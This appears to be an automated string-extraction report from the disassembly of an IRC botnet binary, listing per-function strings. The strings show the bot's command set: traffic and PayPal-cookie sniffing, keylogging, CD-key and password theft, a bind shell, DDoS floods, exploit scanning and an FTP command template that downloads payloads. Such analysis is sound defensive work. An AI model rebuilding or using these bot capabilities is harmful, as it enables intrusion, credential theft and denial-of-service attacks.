sub_418EF6(0456):
"Account: %S"
"Full Name: %S"
"User Comment: %S"
"Comment: %S"
"Unknown"
"Administrator"
"User"
"Guest"
"Privilege Level: %s"
"Auth Flags: %d"
"Home Directory: %S"
"Parameters: %S"
"Password Age: %d"
"Bad Password Count: %d"
"Number of Logins: %d"
"Last Logon: %d"
"Last Logoff: %d"
"Logon Server: %S"
"Country Code: %d"
"User's Language: %d"
"Max. Storage: %d"
|
sub_4124ED(078a):
"FTP sniff"
"#FAAK#"
"NICK "
"220 "
"230 "
"USER "
"PASS "
|
sub_40DFE2(0ba8):
WS2_32.recv
"cmd /c echo open %s %d >> ii &echo user"...
|
sub_412477(0d1f):
"IRC sniff"
"#FAAK#"
"OPER "
"NICK "
"oper "
"You are now an IRC Operator"
|
sub_412660(1147):
WS2_32.htons
"%s"
"%s"
|
sub_4185A4(13b2):
"netapi32.dll"
"NetMessageBufferSend"
|
sub_40F6B3(15ea):
"\\%s"
"%s"
"\n"
"*"
|
sub_40AFEA(2242):
"mIRC"
|
sub_40BFEB(22a3):
"%d.%d.%d.%d"
|
sub_409B12(2657):
"kernel32.dll"
"SetErrorMode"
"CreateToolhelp32Snapshot"
"Process32First"
"GetDiskFreeSpaceExA"
"GetLogicalDriveStringsA"
"SearchPathA"
"QueryPerformanceCounter"
"QueryPerformanceFrequency"
"RegisterServiceProcess"
"user32.dll"
"SendMessageA"
"FindWindowA"
"IsWindow"
"GetClipboardData"
"CloseClipboard"
"GetAsyncKeyState"
"GetKeyState"
"GetWindowTextA"
"GetForegroundWindow"
"advapi32.dll"
"RegCreateKeyExA"
"RegSetValueExA"
"RegQueryValueExA"
"RegDeleteValueA"
"RegCloseKey"
"ClearEventLogA"
"OpenProcessToken"
"LookupPrivilegeValueA"
"AdjustTokenPrivileges"
"OpenSCManagerA"
"OpenServiceA"
"ControlService"
"CloseServiceHandle"
"EnumServicesStatusA"
"IsValidSecurityDescriptor"
"GetUserNameA"
"gdi32.dll"
"CreateDCA"
"CreateDIBSection"
"CreateCompatibleDC"
"GetDIBColorTable"
"SelectObject"
"BitBlt"
"DeleteDC"
"DeleteObject"
"ws2_32.dll"
"WSAStartup"
"WSASocketA"
"WSAAsyncSelect"
"__WSAFDIsSet"
"WSAIoctl"
"WSAGetLastError"
"WSACleanup"
"socket"
"ioctlsocket"
"connect"
"inet_ntoa"
"inet_addr"
"htons"
"htonl"
"ntohs"
"ntohl"
"send"
"sendto"
"recv"
"recvfrom"
"bind"
"select"
"listen"
"accept"
"setsockopt"
"getsockname"
"gethostname"
"getpeername"
"closesocket"
"wininet.dll"
"InternetGetConnectedState"
"InternetGetConnectedStateEx"
"HttpOpenRequestA"
"HttpSendRequestA"
"InternetConnectA"
"InternetOpenUrlA"
"InternetCrackUrlA"
"InternetReadFile"
"InternetCloseHandle"
"Mozilla/4.0 (compatible)"
"icmp.dll"
"IcmpCreateFile"
"IcmpCloseHandle"
"IcmpSendEcho"
"netapi32.dll"
"NetShareAdd"
"NetShareDel"
"NetShareEnum"
"NetScheduleJobAdd"
"NetApiBufferFree"
"NetRemoteTOD"
"NetUserAdd"
"NetUserDel"
"NetUserEnum"
"NetUserGetInfo"
"NetMessageBufferSend"
"NetWkstaGetInfo"
"dnsapi.dll"
"DnsFlushResolverCache"
"DnsFlushResolverCacheEntry_A"
"iphlpapi.dll"
"DeleteIpNetEntry"
"mpr.dll"
"WNetAddConnection2A"
"WNetAddConnection2W"
"WNetCancelConnection2A"
"WNetCancelConnection2W"
"shell32.dll"
"SHChangeNotify"
"odbc32.dll"
"SQLDriverConnect"
"SQLAllocHandle"
"avicap32.dll"
"capCreateCaptureWindowA"
"capGetDriverDescriptionA"
|
sub_4170EC(2749):
"WINLOGON"
"NWGINA"
"MSGINA"
|
sub_4155F7(2bb5):
"Window"
|
sub_41AA42(3324):
"2003"
"%s (%s)"
"couldn't resolve host"
"HH:mm:ss"
|
sub_418C8E(3fe3):
"Share name: Resource: "...
"Yes"
"No"
"%-14S %-24S %-6u %-4s"
|
sub_41A6AE(4107):
"www.schlund.net"
"www.utwente.nl"
"verio.fr"
"www.1und1.de"
"www.switch.ch"
"www.belwue.de"
"de.yahoo.com"
"www.google.it"
"www.xo.net"
"www.stanford.edu"
"www.verio.com"
"www.nocster.com"
"www.rit.edu"
"www.cogentco.com"
"www.burst.net"
"nitro.ucsc.edu"
"www.level3.com"
"www.above.net"
"www.easynews.com"
"www.google.com"
"www.lib.nthu.edu.tw"
"www.st.lib.keio.ac.jp"
"www.d1asia.com"
"www.nifty.com"
"yahoo.co.jp"
"www.google.co.jp"
|
sub_41A88B(423a):
"%dd %dh %dm"
|
sub_415A2F(442b):
"r"
"="
"="
|
sub_401000(4800):
"Windows Servce Agent"
|
sub_424D78(4bef):
"user32.dll"
"MessageBoxA"
"GetActiveWindow"
"GetLastActivePopup"
|
sub_4219D9(502f):
"e+000"
|
sub_416A32(5886):
"%sKB"
"failed"
|
sub_4235C9(5a9a):
""
"..."
"Runtime Error!\n\nProgram: "
"\n\n"
"Microsoft Visual C++ Runtime Library"
|
sub_40D21E(5f99):
"GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
|
sub_426573(5fbb):
"invalid string position"
|
sub_4151AC(6279):
"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
|
sub_4256C2(6338):
"1#SNAN"
"1#IND"
"1#INF"
"1#QNAN"
|
sub_4187DD(6353):
"The specified service name is invalid."
"The requested control code is undefined"...
"The handle is invalid."
"The handle does not have the required a"...
"The service binary file could not be fo"...
"The service cannot be stopped because o"...
"The database is locked."
"A thread could not be created for the s"...
"The process for the service was started"...
"The requested control code is not valid"...
"An instance of the service is already r"...
"The system is shutting down."
"An unknown error occurred: <%ld>"
|
sub_41895B(67a8):
"The following Windows services are regi"...
" Unknown"
" Paused"
" Pausing"
" Continuing"
" Running"
" Stoping"
" Starting"
" Stopped"
"%s: %s (%s)"
|
sub_418211(69e7):
"mIRC"
|
sub_401955(6ab9):
"PASS %s\r\n"
|
sub_4157F0(6f62):
"Window"
|
sub_40B64A(7139):
" Total: %d in %s."
|
sub_40F530(7426):
"text/html"
"application/octet-stream"
"ddd, dd MMM yyyy"
"HH:mm:ss"
"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
|
sub_412360(79f8):
"Bot sniff"
"#FAAK#"
"[PSNIFF]:"
"PSNIFF//"
"JOIN #"
"302 "
"366 "
":.login"
":!login"
":!Login"
":.Login"
":.ident"
":!ident"
":.hashin"
":!hashin"
|
sub_417ADD(7aa9):
"-|`_\\{[]}"
"-|`_\\{[]}"
"-|`_\\{[]}"
"-|`_\\{[]}"
|
sub_4247EC(7e1a):
"TZ"
|
sub_40B384(8732):
"%s %s stopped. (%d thread(s) stopped.)"
"%s No %s thread found."
|
sub_40B7DA(8cec):
" Scan Time: %s."
|
sub_4196BC(9226):
"SeDebugPrivilege"
" %s (%d)"
"SeDebugPrivilege"
|
sub_41814C(951b):
"%s Error: %s <%d>."
|
sub_412B08(956f):
"ddos.syn"
"ddos.ack"
"ddos.random"
|
sub_40ACB5(9858):
"%s"
|
sub_41945F(9bb4):
"Invalid parameter."
"Server name not found."
"This network request is not supported."
"Not enough memory."
"The name is invalid."
"Duplicate share name."
"Invalid for redirected resource."
"Device or directory does not exist."
"Level parameter is invalid."
"A general failure occurred in the netwo"...
"The operation is allowed only on the pr"...
"The user account already exists."
"The group already exists."
"The password is shorter than required ("...
"An unknown error occurred."
"The computer name is invalid."
"Share not found."
"The user name could not be found."
"Network connection not found."
|
sub_418337(9dbe):
"SeShutdownPrivilege"
|
sub_4192DF(a909):
"Username accounts for local system:"
" %S"
"Total users found: %d."
|
sub_418359(a91a):
"%sdel.bat"
"@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
"%%comspec%% /c %s %s"
|
sub_4218B2(aba6):
"KERNEL32"
"IsProcessorFeaturePresent"
|
sub_40A7CE(ac3c):
"Kernel32.dll failed. <%d>"
"User32.dll failed. <%d>"
"Advapi32.dll failed. <%d>"
"Gdi32.dll failed. <%d>"
"Ws2_32.dll failed. <%d>"
"Wininet.dll failed. <%d>"
"Icmp.dll failed. <%d>"
"Netapi32.dll failed. <%d>"
"Dnsapi.dll failed. <%d>"
"Iphlpapi.dll failed. <%d>"
"Mpr32.dll failed. <%d>"
"Shell32.dll failed. <%d>"
"Odbc32.dll failed. <%d>"
"Avicap32.dll failed. <%d>"
|
sub_419A88(b276):
"PRIVMSG %s :%s\r"
"%s"
|
sub_4169A1(b2db):
"Cdrom"
"Network"
"Disk"
"Invalid"
"Unknown"
|
sub_412574(b9cf):
"HTTP sniff"
"#FAAK#"
"paypal"
"PAYPAL"
"PAYPAL.COM"
"paypal.com"
"Set-Cookie:"
|
sub_418293(c0b1):
"explorer.exe"
|
sub_409A72(c23a):
"NOTICE"
"PRIVMSG"
"%s"
"%s %s :%s\r\n"
|
sub_40F0D5(c66a):
"GET "
" "
"\r\n"
|
sub_4125FB(cfb4):
"VULN sniff"
"#FAAK#"
"OpenSSL/0.9.6"
"Serv-U FTP Server"
"OpenSSH_2"
|
sub_41A19D(d12b):
"Software\\Microsoft\\OLE"
"EnableDCOM"
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
"restrictanonymous"
"%c$"
"%c:\\"
|
sub_416F1A(d3af):
"SeDebugPrivilege"
"NTDLL.DLL"
"NtQuerySystemInformation"
"RtlCreateQueryDebugBuffer"
"RtlQueryProcessDebugInformation"
"RtlDestroyQueryDebugBuffer"
"RtlRunDecodeUnicodeString"
"SeDebugPrivilege"
|
sub_4153BC(d63a):
"DISPLAY"
|
sub_419E79(d7b4):
"Software\\Microsoft\\OLE"
"EnableDCOM"
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
"restrictanonymous"
|
sub_417788(d935):
"\n"
|
sub_4178BA(d9b1):
"NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."...
|
sub_416C28(dc5b):
"A:\\"
|
sub_40AC0F(e076):
"%d.%d.%d.%d"
|
sub_401ACD(e17e):
" :"
" "
"!"
"PING"
"PONG %s\r\n"
"JOIN %s %s\r\n"
"001"
"005"
"302"
"@"
"433"
"NICK %s\r\n"
"KICK"
"NOTICE %s :%s\r\n"
"JOIN %s %s\r\n"
"NICK"
":%s%s"
"PART"
"QUIT"
"353"
"PART"
"NOTICE %s :%s\r\n"
"PRIVMSG"
"NOTICE"
"SEND"
"%s"
"CHAT"
"%s"
"k"
" :"
"$%d-"
"$%d"
"$me"
"$user"
"$chan"
"$rndnick"
"$server"
"$chr("
")"
"63"
" "
" "
"rndnick"
"rn"
"die"
"d"
"logout"
"lo"
"version"
"ver"
"dedication"
"ded"
"speedtest"
"st"
"secure"
"sec"
"unsecure"
"unsec"
"bindshell"
"bd"
"Server"
"socks4"
"s4"
"socks4stop"
"Server"
"rloginstop"
"Server"
"httpstop"
"Server"
"logstop"
"redirectstop"
"synstop"
"skysynstop"
"targa3stop"
"wonkstop"
"packetstop"
"tsunamistop"
"wisdomstop"
"udpstop"
"pingstop"
"tftpstop"
"Server"
"findfilestop"
"ffstop"
"procsstop"
"psstop"
"clonestop"
"Clone"
"securestop"
"Secure"
"scanstop"
"Scan"
"scanstats"
"stats"
"trstats"
"connectbackstats"
"cbstats"
"exploitlist"
"explist"
"reconnect"
"r"
"disconnect"
"dc"
"quit"
"q"
"status"
"s"
"id"
"i"
"reboot"
"threads"
"t"
"aliases"
"al"
"log"
"lg"
"clearlog"
"clg"
"netinfo"
"ni"
"sysinfo"
"si"
"lsp100"
"lsp100"
"procs"
"ps"
"getcdkeys"
"key"
"uptime"
"up"
"driveinfo"
"drv"
"testdlls"
"dll"
"opencmd"
"ocmd"
"cmdstop"
""
"%d. %s"
"spoof"
"off"
"getclip"
"gc"
"flusharp"
"farp"
"flushdns"
"fdns"
"currentip"
"cip"
"rloginserver"
"rlogin"
"httpserver"
"http"
"tftpserver"
"tftp"
"crash"
"crash"
"asn445"
"asc"
"phonehome"
"NOTICE %s :PHONING HOME: hi ;).\r\n"
"findpass"
"fp"
"#f"
"Random"
"Sequential"
"full"
"%s"
"Dark"
"QUIT :%s\r\n"
"QUIT :later\r\n"
"QUIT :disconnecting\r\n"
"QUIT :reconnecting\r\n"
"secure"
"sec"
"Unsecuring"
"abosel7 v4"
"get"
"%d.%d.%d.*"
"exploit"
"#f"
"reconnect.in"
"rin"
"reconnect.in.ms"
"rinms"
"flood"
"load"
" "
" "
"nt"
" "
"notice %s :%s"
"mode"
" "
"mode %s %s"
"join"
"join %s"
"part"
"part %s"
"partflood"
"CYBER"
"part %s %s"
"pnick"
"join %s"
"CYBER"
"part %s %s"
"join %s"
"CYBER"
"part %s %s"
"join %s"
"CYBER"
"part %s %s"
"nick"
"join %s"
"chgnick"
"msg"
"join %s"
"CYBER"
"CYBER"
"CYBER"
"notice"
"join %s"
"CYBER"
"NOTICE %s :%s"
"CYBER"
"NOTICE %s :%s"
"CYBER"
"NOTICE %s :%s"
"ctcp"
"join %s"
"mix"
"join %s"
"CYBER"
"NOTICE %s :%s"
"CYBER"
"PRIVMSG %s :%s"
"CYBER"
"NOTICE %s :%s"
"register"
"nickserv register %s %s"
"off"
"nick"
"n"
"join"
"j"
"part"
"pt"
"raw"
"r"
"killthread"
"k"
"c_quit"
"c_q"
"c_rndnick"
"c_rn"
"prefix"
"pr"
"open"
"o"
"server"
"se"
"dns"
"dn"
"killproc"
"kp"
"kill"
"ki"
"delete"
"del"
"get"
"gt"
"list"
"li"
"visit"
"v"
"mirccmd"
"mirc"
"cmd"
"cm"
"readfile"
"rf"
"psniff"
"on"
"#f"
"off"
"sniffer"
"on"
"#f"
"off"
"ident"
"on"
"off"
"keylog"
"on"
"file"
"off"
"#f"
"net"
"start"
"stop"
"pause"
"continue"
"delete"
"%s"
"share"
"user"
"send"
"capture"
"cap"
"gethost"
"gh"
"killlog"
"kl"
"addalias"
"aa"
"privmsg"
"action"
"a"
"cycle"
"cy"
"mode"
"m"
"c_raw"
"c_r"
"c_mode"
"c_m"
"c_nick"
"c_n"
"c_join"
"c_j"
"c_part"
"c_p"
"targa3"
"t3"
"tsunami"
"tsn"
"repeat"
"rp"
"delay"
"de"
"jp]de100"
"jp]10"
"execute"
"e"
"findfile"
"ff"
"rename"
"mv"
"icmpflood"
"icmp"
"clone"
"c"
"ddos.syn"
"ddos.ack"
"ddos.random"
"wisdom.udp"
"synflood"
"syn"
"skysyn"
"phatwonk"
"wonk"
"jpldg10"
"jpl10"
"redirect"
"rd"
"scan"
"sc"
"c_privmsg"
"c_pm"
"c_action"
"c_a"
"portscan"
"psc"
"advscan"
"asc"
"udpflood"
"udp"
"u"
"netsend"
"ns"
"pingflood"
"ping"
"p"
"tcpflood"
"tcp"
"email"
" "
"helo $rndnick\nmail from: <%s>\nrcpt to: "...
"httpcon"
"hcon"
"syn"
"ack"
"random"
"Spoofed"
"Normal"
"ICMP.dll not available"
"upload"
"%s\\%i%i%i.dll"
"ab"
"open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
"-s:%s"
"ftp.exe"
"open"
"#f"
"Random"
"Sequential"
"[%s] * %s %s"
"[%s] <%s> %s"
"Dark"
"%s%s.exe"
"repeat"
"MODE %s\r\n"
"JOIN %s %s\r\n"
"screen"
"drivers"
"frame"
"video"
"r"
"\n"
"%s"
"open"
"QUIT :later\r\n"
"all"
"JOIN %s %s\r\n"
"NICK %s\r\n"
"QUIT :reconnecting\r\n"
"QUIT :reconnecting\r\n"
"NICK %s\r\n"
"!"
"~"
"cool"
"NOTICE %s :Pass auth failed (%s!%s).\r\n"
"NOTICE %s :Your attempt has been logged"...
"NOTICE %s :Host Auth failed (%s!%s).\r\n"
"NOTICE %s :Your attempt has been logged"...
"cool"
"USERHOST %s\r\n"
"-x+i"
"MODE %s %s\r\n"
"JOIN %s %s\r\n"
|
sub_4100DB(e1a1):
"%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
|
sub_40C124(eb37):
"sym"
|
sub_4177CF(ed20):
" "
"PING"
"433"
|
sub_40CADA(f1cc):
"BBBB"
"CCCC"
|
sub_41A4D1(f3f9):
"POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
"\r\n"
|
sub_40F96A(f533):
"\n"
"PRIVMSG %s :Searching for: %s\r\n"
"\r\n\r\nIndex of %s</TIT"...
"<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
"<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
"<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
".."
"."
"PM"
"AM"
"%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
"<%s>"
"PRIVMSG %s :%-31s %-21s\n"
"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
"%s%s/"
"\"><CODE>%.29s>/</CODE></A>"
"\"><CODE>%s/</CODE></A>"
"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
"<%s>"
"%-31s %-21s\r\n"
"PRIVMSG %s :%-31s %-21s (%s bytes)\n"
"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
"\"><CODE>%.30s></CODE></A>"
"\"><CODE>%s</CODE></A>"
"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
"%-31s %-21s (%i bytes)\r\n"
"PRIVMSG %s :Found %s Files and %s Direc"...
"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
"Found: %i Files and %i Directories\r\n"
</font></pre></td></tr><tr id="sub_416B56"><td><pre><a name="sub_416B56"></a><a href="6c56bbeb359e7723c82167a4f4ce568e_unpacked.asm.html#sub_416B56"><font size=+2>sub_416B56</a>(f5ac)</font>:<font color=brown>
"failed"
</font></pre></td></tr><tr id="sub_410F1F"><td><pre><a name="sub_410F1F"></a><a href="6c56bbeb359e7723c82167a4f4ce568e_unpacked.asm.html#sub_410F1F"><font size=+2>sub_410F1F</a>(fa3f)</font>:<font color=brown>
"cmd /q"
</font></pre></td></tr></table><script>
document.getElementById(window.location.href.split('#')[1]).setAttribute("style", "background-color:#ddddff");
</script>
</html> |